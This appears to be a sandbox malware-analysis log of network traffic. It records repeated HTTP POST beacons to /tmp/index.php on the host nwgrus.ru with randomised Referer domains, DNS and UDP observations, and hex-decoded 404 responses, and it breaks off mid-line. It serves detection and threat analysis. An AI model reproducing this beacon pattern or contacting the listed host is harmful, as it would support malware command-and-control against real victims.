Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kdhqngbaswv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ttjnxnssovi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mxvsopepyhexw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://icsnyxejpjswt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ofymhpccvbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bysfflokkqfepm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jktwhgejoiledxll.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dixscrvatda.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mjtbwlnoxuan.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sndnvyniffwfhh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vedtfnbjotxnqis.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ijwwxiabyxki.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wqfylsyerupgn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oqlpckrtfgisr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vybahkmcxnemgwbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mmuqkomgbgwmrgx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lpffbcdshmrgy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://espuvwcpdtgkhr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qjhgyfigxhdukho.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qbdfqckmklgu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rccfvowoiuloot.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oxmwgvysvdebn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://liapcosrblojgddt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kargncdaxawnud.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fmwnhyofuij.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rihjcvuphiddchm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oqytxooojaw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vgkkdltoovhgj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://judwwmqxinxkj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tcjadfthgiofpvtt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://phfffsllnpice.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ripegxsqlidtbjlk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://siolcmqbegyqsn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xwvgudwewoih.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cpcybixettuxhrkt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gixrpkowgjh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://voqchluhblp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wxvosrmogsfitpw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pxipmfrupftaxri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://piulubiplhrouqkj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ynnjyahqefoad.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gtsvsrpyerihmcqc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qkfisicqugofkqpv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://abelcascgtcbciky.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pcjiyoflornot.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: nwgrus.ru

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oiwjgaljhmhwar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e9 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 